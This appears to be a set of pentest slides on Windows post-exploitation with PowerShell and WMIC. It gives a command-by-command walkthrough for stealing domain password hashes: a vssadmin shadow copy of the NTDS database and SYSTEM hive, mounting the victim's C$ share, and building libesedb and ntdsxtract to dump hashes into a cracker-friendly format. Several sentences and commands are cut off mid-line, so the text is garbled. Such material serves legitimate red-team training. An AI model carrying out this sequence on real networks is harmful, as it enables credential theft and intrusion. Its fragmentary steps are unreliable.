MIHIR SHAH | SHAHENSHAH
Github : github.com/shahenshah99
PowerShell is a command-line and scripting
language framework for task automation and
configuration management. For the Windows pen
tester of today, it's a comprehensive and powerful
tool in your arsenal that just so happens to be
installed on all of your victim PCs.
What is Powershell?
When I described PowerShell as a task automation and
configuration management framework, that's more along
the lines of Microsoft's definition of PowerShell. As
hackers, we think of what things can do, not necessarily
how their creators defined them; in that sense, PowerShell
is the Windows command line on steroids.
A cmdlet is really just a command, at least conceptually;
behind the scenes, they're .NET classes for implementing
particular functionality. They're the native body of
commands within PowerShell and they use a unique self-
explanatory syntax style: Verb-Noun.
So, you have your foothold on a Windows box. Setting
aside the possibility of uploading our own tools, can we use
a plain off-the-shelf copy of Windows to poke around for a
potential next stepping stone? With PowerShell, there isn't
much we can't do.
Delivering a Trojan to your target via
Named pipes and security
The named pipe concept gives the pipe a name, and by having
a name, it utilizes the filesystem so that interaction with it is like
interacting with a file. Remember the purpose of our pipelines, to
take the output of a command and pipe it as input to another
named pipes, although they work a lot like files, cannot
actually be mounted in the filesystem. They have their own
filesystem and are referenced with .pipe[name]. There
are functions available to the software developer to work
with named pipes (for example CreateFile, WriteFile, and
WMIC is the name of a tool and it stands for
Windows Management Instrumentation Command.
The tool allows us to perform WMI operations. WMI
is the Windows infrastructure for operations and
management data. In addition to providing
management data to other parts of Windows and
other products altogether, it's possible to automate
administrative tasks both locally and remotely with
WMI scripts and applications
WMIC commands fired off at the command line leave no
traces of software or code lying around. While WMI
activity can be logged, many organizations fail to turn it
on or review the logs.
In almost any Windows environment, WMI and
PowerShell can't be blocked.
Creating a shadow file
> vssadmin Create Shadow /For=C:
The NTDS database is stored in the NTDS
directory under Windows, and you'll find
SYSTEM inside the system32config folder.
Creating a copy of the shadow file to
retrieve by the attacking box
Retrieving files your
apt-get install cifs-utils
Mount the filesystem to the
mount -t cifs //<IP>/C$ -o username=Administrator
Password hash extraction with libesedb and
# git clone https://github.com/libyal/libesedb
# git clone https://github.com/csababarta/ntdsxtract
# cd libesedb
# apt-get install git autoconf automake autopoint libtool pkg-config build-
# chmod +x configure
# make install
Exporting all the tables from
# esedbexport -m tables ntds.dit
Where’s the hash?
We can pass the data table and link table to the dsusers
Python script, along with the location of the SYSTEM hive
(which contains the SYSKEY), and ask the script to nicely
format our hashes into a cracker-friendly format: